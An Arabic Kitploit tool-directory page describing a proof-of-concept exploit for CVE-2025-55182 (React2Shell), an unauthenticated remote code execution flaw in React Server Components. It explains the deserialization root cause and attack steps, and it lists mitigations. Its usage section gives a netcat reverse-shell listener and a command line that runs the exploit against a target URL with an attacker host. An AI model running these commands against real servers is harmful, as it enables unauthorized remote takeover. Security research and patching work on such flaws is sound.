Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-React2Shell-RCE — استغلال إثبات المفهوم لـ CVE-2025-55182 (React2Shell)، وهي ثغرة تنفيذ أكواد عن بُعد بدون مصادقة في React Server Components عبر حمولات بروتوكول Flight مصمّمة بعناية. | Kitploit
أدوات/GitHubGitHub/herick-costa/cve-2025-55182-react2shell-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
herick-costa/cve-2025-55182-react2shell-rce

CVE-2025-55182-React2Shell-RCE

استغلال إثبات المفهوم لـ CVE-2025-55182 (React2Shell)، وهي ثغرة تنفيذ أكواد عن بُعد بدون مصادقة في React Server Components عبر حمولات بروتوكول Flight مصمّمة بعناية.

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

CVE CVSS RCE Status

CVE-2025-55182 - React2Shell (RCE بدون مصادقة في React Server Components)

تُعد CVE-2025-55182، المعروفة أيضًا باسم React2Shell، ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة حرجة تؤثر على حزم React Server Components (الإصدارات 19.0 و19.1.0 و19.1.1 و19.2.0).

قد تسمح هذه الثغرة للمهاجمين بتحقيق تنفيذ عشوائي للتعليمات البرمجية على الخوادم المعرضة للخطر عبر طلب HTTP واحد مصمم بعناية، دون الحاجة إلى مصادقة.


نظرة عامة

تستخدم مكونات React Server بروتوكول Flight لتسلسل وإلغاء تسلسل بيانات المكونات المتبادلة بين العميل والخادم.

قد يسمح التحقق غير السليم أثناء عملية إلغاء التسلسل هذه بحمولات مصممة بعناية للتلاعب ببنى الكائنات الداخلية والوصول إلى بدائيات تنفيذ JavaScript الخطيرة.


السبب الجذري

تنشأ الثغرة من التحقق غير الكافي أثناء إلغاء تسلسل حمولات بروتوكول Flight الخاصة بمكونات React Server (RSC).

قد تؤدي الحمولات المصممة بعناية إلى:

  • التلاعب ببنى الكائنات الداخلية
  • اجتياز سلسلة النموذج الأولي في JavaScript
  • الوصول إلى مُنشئات JavaScript الخطيرة
  • تحقيق تنفيذ عشوائي للتعليمات البرمجية على الخادم

كيف يعمل

  1. يُرسل الاستغلال طلب multipart/form-data مصممًا بعناية
  2. يفسّر الخادم الطلب كحمولة React Flight
  3. تتم معالجة الجزء الخبيث أثناء إلغاء التسلسل
  4. تقوم الحمولة بـ:
  • التلاعب بتدفق التنفيذ الداخلي
  • الوصول إلى بدائيات تنفيذ JavaScript الخطيرة
  • تنفيذ تعليمات برمجية عشوائية
  1. يحصل المهاجم على تنفيذ تعليمات برمجية عن بُعد على الخادم المستهدف

🚀 الاستخدام

ابدأ مستمعًا على جهازك:

root@kitploit:~
nc -lvnp 4444

شغّل الاستغلال:

root@kitploit:~
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100

المتطلبات

  • إصدارات React / Next.js المعرضة للخطر
  • تفعيل مكونات React Server من جانب الخادم
  • نقطة نهاية RSC قابلة للوصول

التخفيف

للتخفيف من هذه الثغرة:

  • قم بترقية React إلى أحدث إصدار مصحح متاح
  • طبّق التصحيحات المتاحة للإطار البرمجي
  • راقب وامنع طلبات RSC المشبوهة

المراجع

- OffSec – تحليل استغلال CVE-2025-55182

- Microsoft Security – الدفاع ضد React2Shell

- استشارة أمان React (الإفصاح الرسمي)


إخلاء المسؤولية

يُقدَّم هذا المشروع بشكل صارم من أجل:

  • البحث الأمني
  • الأغراض التعليمية
  • التقييمات الأمنية المعتمدة واختبارات الاختراق

لا يتحمل المؤلفون أي مسؤولية عن إساءة الاستخدام أو الأضرار الناجمة عن هذه المادة. يتحمل المستخدمون وحدهم مسؤولية الامتثال لجميع القوانين واللوائح المعمول بها.

تنزيل الأداة